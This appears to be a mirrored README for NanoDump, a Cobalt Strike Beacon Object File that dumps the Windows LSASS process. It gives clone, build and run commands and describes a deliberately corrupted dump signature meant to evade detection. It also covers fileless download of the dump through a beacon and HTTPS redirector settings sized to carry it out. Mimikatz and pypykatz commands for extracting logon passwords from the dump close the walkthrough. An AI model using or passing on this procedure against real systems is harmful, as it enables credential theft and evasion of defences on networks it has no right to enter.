Git Product home page Git Product logo

nanodump's Introduction

NanoDump

A Beacon Object File that creates a minidump of the LSASS process.

screenshot

Features

  • It uses syscalls (with SysWhispers2) for most operations
  • You can choose to download the dump without touching disk or write it to a file
  • The minidump by default has an invalid signature to avoid detection
  • It reduces the size of the dump by ignoring irrelevant DLLs. The (nano)dump tends to be arround 10 MB in size
  • You don't need to provide the PID of LSASS
  • No calls to dbghelp or any other library are made, all the dump logic is implemented in nanodump
  • You can use the .exe version to run nanodump outside of Cobalt Strike ๐Ÿ˜„

Usage

Clone

git clone https://github.com/helpsystems/nanodump.git

Compile (optional)

cd nanodump
make

Import

Import the NanoDump.cna script on Cobalt Strike.

Run

Run the nanodump command.

beacon> nanodump

Restore the signature

Once you downloaded the minidump, restore the invalid signature

bash restore_signature.sh <dumpfile>

get the secretz

mimikatz

To get the secrets simply run:

mimikatz # sekurlsa::minidump <dumpfile>
mimikatz # sekurlsa::logonPasswords full

pypykatz

If you prefer to stay on linux, you can use the python3 port of mimikatz called pypykatz.

python3 -m pypykatz lsa minidump <dumpfie>

Parameters

--pid -p < PID > (optional)

PID of lsass. If not entered, nanodump will find it dinamically.

--write -w < path > (optional)

Where to write the dumpfile. If this parameter is not provided, the dump will be downloaded in a fileless manner.

--valid -v (optional)

If entered, the minidump will have a valid signature.
If not entered, before analyzing the dump restore the signature of the dump, with: bash restore_signature.sh <dumpfile>

HTTPS redirectors

If you are using an HTTPS redirector (as you should), you might run into issues due to the size of the requests that leak the dump.
Increase the max size of requests on your web server to allow nanodump to download the dump.

NGINX

location ~ ^...$ {
    ...
    client_max_body_size 50M;
}

Apache2

<Directory "...">
    LimitRequestBody  52428800
</Directory>

Credits

nanodump's People

Contributors

s4ntiagop avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.